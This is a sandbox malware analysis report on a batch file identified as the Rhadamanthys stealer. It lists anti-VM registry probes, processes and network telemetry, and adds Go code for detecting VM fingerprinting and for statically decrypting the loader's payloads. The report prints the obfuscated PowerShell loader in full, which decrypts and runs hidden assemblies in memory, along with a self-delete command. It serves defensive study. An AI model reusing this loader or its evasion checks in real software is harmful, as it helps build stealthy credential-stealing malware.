Malware Analysis Report

2025-08-05 09:57

Sample ID 230419-tknefabg49
Target 10FpDvByrqvHWUgFegBMjMmEkh.bat
SHA256 23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1
Tags
rhadamanthys evasion stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1

Threat Level: Known bad

The file 10FpDvByrqvHWUgFegBMjMmEkh.bat was found to be: Known bad.

Malicious Activity Summary

rhadamanthys evasion stealer

Rhadamanthys

Detect rhadamanthys stealer shellcode

Looks for VirtualBox Guest Additions in registry

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Enumerates VirtualBox registry keys

Looks for VMWare Tools registry key

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Suspicious use of NtSetInformationThreadHideFromDebugger

Checks system information in the registry

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-04-19 16:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-04-19 16:07

Reported

2023-04-19 16:09

Platform

win7-20230220-en

Max time kernel

31s

Max time network

34s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -w hidden -c #

C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

"C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;

Network

N/A

Files

memory/904-58-0x000000001B170000-0x000000001B452000-memory.dmp

memory/904-59-0x0000000002460000-0x0000000002468000-memory.dmp

memory/904-60-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/904-61-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/904-62-0x00000000024A0000-0x0000000002520000-memory.dmp

memory/904-63-0x00000000024AB000-0x00000000024E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/972-69-0x0000000001E70000-0x0000000001EB0000-memory.dmp

memory/972-70-0x0000000001E70000-0x0000000001EB0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-04-19 16:07

Reported

2023-04-19 16:09

Platform

win10v2004-20230220-en

Max time kernel

52s

Max time network

131s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
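Read together, the evasion rows above show one process (the renamed PowerShell host) probing VirtualBox service keys, the VBOX__ ACPI table IDs, the Guest Additions and VMware Tools keys, the \??\VBoxMiniRdrDN device, BIOS strings, SystemManufacturer and the SCSI enumeration tree within the same short run. No single one of these reads is suspicious; the combination inside a few hundred milliseconds is. The Go program below is an added example, not part of this report or of any vendor tooling: it scores registry-access telemetry of this shape per process, weighting hypervisor-specific names above generic hardware keys that installers and inventory agents read legitimately, and only counts hits that fall within a window of the process's first hit. The sample events are constructed from the behavioral2 signature table (PID 452 is the .bat.exe host in that run); the inventory agent, the weights, the 5-second window and the alert threshold are assumptions made for the example.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// RegEvent is one registry or device-namespace access as a sandbox or Sysmon
// (event ID 12/13) would record it. The events fed in below are constructed.
type RegEvent struct {
	At     time.Time
	PID    int
	Image  string
	Target string
}

// artifact is a VM-fingerprinting indicator taken from the signatures above;
// hypervisor-specific names outweigh generic keys that installers read legitimately.
type artifact struct {
	family, pattern string // pattern: case-insensitive substring of Target
	weight          int
}

var artifacts = []artifact{ // weights are an assumption for this example
	{"VirtualBox", `\Services\VBox`, 2}, // VBoxSF, VBoxGuest, VBoxMouse, ...
	{"VirtualBox", `VBOX__`, 3},         // ACPI DSDT/FADT/RSDT table IDs
	{"VirtualBox", `VirtualBox Guest Additions`, 3},
	{"VirtualBox", `VBoxMiniRdrDN`, 3}, // shared-folder device under \??\
	{"VMware", `VMware Tools`, 3},
	{"generic", `SystemBiosVersion`, 1},
	{"generic", `SystemManufacturer`, 1},
}

// Verdict summarises one process's fingerprinting activity inside the window.
type Verdict struct {
	PID      int
	Image    string
	First    time.Time // time of the first matched artifact
	Score    int
	Families map[string]bool
	Hits     map[string]bool
}

// Alert needs enough distinct artifacts plus at least one hypervisor-specific
// name, which a plain hardware-inventory query has no reason to touch.
func (v *Verdict) Alert() bool {
	return v.Score >= 5 && (v.Families["VirtualBox"] || v.Families["VMware"])
}

// ScoreAntiVM groups time-ordered events by PID and counts each matched artifact
// once if it occurs within window of that process's first hit, so an agent
// reading one key an hour later does not accumulate a score.
func ScoreAntiVM(events []RegEvent, window time.Duration) map[int]*Verdict {
	out := map[int]*Verdict{}
	for _, e := range events {
		for _, a := range artifacts {
			if !strings.Contains(strings.ToLower(e.Target), strings.ToLower(a.pattern)) {
				continue
			}
			v := out[e.PID]
			if v == nil {
				v = &Verdict{PID: e.PID, Image: e.Image, First: e.At,
					Families: map[string]bool{}, Hits: map[string]bool{}}
				out[e.PID] = v
			}
			if e.At.Sub(v.First) <= window && !v.Hits[a.pattern] {
				v.Score += a.weight
				v.Families[a.family] = true
				v.Hits[a.pattern] = true
			}
		}
	}
	return out
}

// SampleEvents is constructed from the behavioral2 signature table (PID 452 is the
// renamed PowerShell host in that run) plus a hypothetical inventory agent for contrast.
func SampleEvents() []RegEvent {
	t0 := time.Date(2023, 4, 19, 16, 8, 0, 0, time.UTC)
	mal := `C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe`
	agent := `C:\Program Files\Inventory\agent.exe` // hypothetical, not from the report
	probes := []string{
		`\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF`,
		`\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest`,
		`\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__`,
		`\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions`,
		`\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools`,
		`\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion`,
		`\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer`,
		`\??\VBoxMiniRdrDN`,
	}
	var ev []RegEvent
	for i, p := range probes {
		ev = append(ev, RegEvent{t0.Add(time.Duration(i) * 50 * time.Millisecond), 452, mal, p})
	}
	return append(ev,
		RegEvent{t0.Add(time.Second), 1234, agent, probes[6]},
		RegEvent{t0.Add(time.Hour), 1234, agent, probes[5]})
}

func main() {
	for _, v := range ScoreAntiVM(SampleEvents(), 5*time.Second) {
		fmt.Printf("pid %d %s score=%d alert=%v\n", v.PID, v.Image, v.Score, v.Alert())
	}
}
```

On the constructed input the .bat.exe host scores 16 across both hypervisor families and alerts; the agent scores 1 because its second read falls outside the window, and it never touches a hypervisor-specific name. The VBoxSF and VBoxGuest rows count once, since both match the same service-key pattern; that is deliberate, so that a process enumerating every VBox* service does not inflate its score beyond what the distinct technique warrants.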

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -w hidden -c #

C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

"C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;
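The command line above (identical in the behavioral1 run) is the whole loader. Its Dr() helper strips the token AXQs from each string to rebuild .NET member names, so `FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs` is `FromBase64String` and `EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs` is `EntryPoint`. It then takes its own image path, drops the `.exe` extension to get back to the `.bat`, reads that file's first line, skips three characters, splits the remainder on `\`, and treats the four fields as two base64 ciphertexts, a base64 AES key and a base64 IV. Each ciphertext is AES-CBC/PKCS7-decrypted, GZip-inflated and loaded with Assembly.Load, and the second field's entry point is invoked before the first's. The Go program below is an added example, not part of this report or of the sample: it performs the same decoding statically so the payloads can be recovered without executing them. The real first line of the .bat is not shown in the report, so BuildStagerLine, its `::\` prefix, and the payloads, key and IV in main are constructed for the example; only the parsing and decryption steps follow the script.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// Junk is the token the loader's Dr() helper strips from every .NET member name it builds.
const Junk = "AXQs"

// Deobfuscate reproduces Dr(): remove the junk token to reveal the real member name.
func Deobfuscate(s string) string { return strings.ReplaceAll(s, Junk, "") }

// decryptAndInflate mirrors PiTFT() followed by WDCxf(): AES-CBC with PKCS#7 padding
// under a base64 key and IV, then GZip decompression of the plaintext.
func decryptAndInflate(ct []byte, keyB64, ivB64 string) ([]byte, error) {
	key, errK := base64.StdEncoding.DecodeString(keyB64)
	iv, errI := base64.StdEncoding.DecodeString(ivB64)
	if errK != nil || errI != nil || len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key/iv encoding, iv length, or ciphertext alignment")
	}
	block, err := aes.NewCipher(key) // 16, 24 or 32-byte key, as Aes.Create() accepts
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1]) // PKCS#7: last byte is the pad length, every pad byte repeats it
	if n == 0 || n > aes.BlockSize || bytes.Count(pt[len(pt)-n:], []byte{byte(n)}) != n {
		return nil, fmt.Errorf("bad PKCS#7 padding (wrong key or IV?)")
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt[:len(pt)-n]))
	if err != nil {
		return nil, err
	}
	defer zr.Close()
	return io.ReadAll(zr)
}

// ExtractPayloads parses the first line of the .bat the way the loader does (skip
// three characters, split on '\': ciphertext1, ciphertext2, key, iv) and returns both
// payloads decrypted and inflated without loading them. The loader runs index 1 first.
func ExtractPayloads(firstLine string) ([][]byte, error) {
	var f []string
	if len(firstLine) >= 3 {
		f = strings.Split(firstLine[3:], `\`)
	}
	if len(f) < 4 {
		return nil, fmt.Errorf("expected 4 '\\'-separated fields after a 3-char prefix, got %d", len(f))
	}
	var out [][]byte
	for i := 0; i < 2; i++ {
		raw, err := base64.StdEncoding.DecodeString(f[i])
		if err == nil {
			raw, err = decryptAndInflate(raw, f[2], f[3])
		}
		if err != nil {
			return nil, fmt.Errorf("field %d: %w", i, err)
		}
		out = append(out, raw)
	}
	return out, nil
}

// BuildStagerLine is the loader's inverse, included only so the example can build an
// input offline: gzip, PKCS#7-pad, AES-CBC encrypt, base64, join with '\' behind a
// placeholder three-character prefix (the real .bat prefix is not shown in the report).
func BuildStagerLine(p1, p2, key, iv []byte) string {
	block, _ := aes.NewCipher(key) // caller passes a valid 16/24/32-byte key
	enc := func(p []byte) string {
		var gz bytes.Buffer
		w := gzip.NewWriter(&gz)
		w.Write(p)
		w.Close()
		pad := aes.BlockSize - gz.Len()%aes.BlockSize
		pt := append(gz.Bytes(), bytes.Repeat([]byte{byte(pad)}, pad)...)
		ct := make([]byte, len(pt))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
		return base64.StdEncoding.EncodeToString(ct)
	}
	b64 := base64.StdEncoding.EncodeToString
	return `::\` + strings.Join([]string{enc(p1), enc(p2), b64(key), b64(iv)}, `\`)
}

func main() {
	// Constructed sample input: fake payloads, key and IV chosen for this example only.
	key, iv := bytes.Repeat([]byte{0x11}, 32), bytes.Repeat([]byte{0x22}, 16)
	ps, err := ExtractPayloads(BuildStagerLine([]byte("MZ fake stage"), []byte("fake stage 2"), key, iv))
	fmt.Println(Deobfuscate("FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs"), err)
	for i, p := range ps {
		fmt.Printf("payload %d: %q MZ=%v\n", i, p, bytes.HasPrefix(p, []byte("MZ")))
	}
}
```

Against a real sample, replace the constructed line with the first line of the .bat and check that each recovered payload starts with `MZ`; a padding or gzip error means the key, IV or field order does not match this loader variant. Go is used here because its standard library carries AES-CBC, base64 and gzip, so the extractor runs offline with no third-party dependency.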

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
GB 51.105.71.137:443 N/A tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 209.197.3.8:80 N/A tcp

Files

memory/3664-133-0x000001DB290F0000-0x000001DB29112000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2qamug0.d3r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

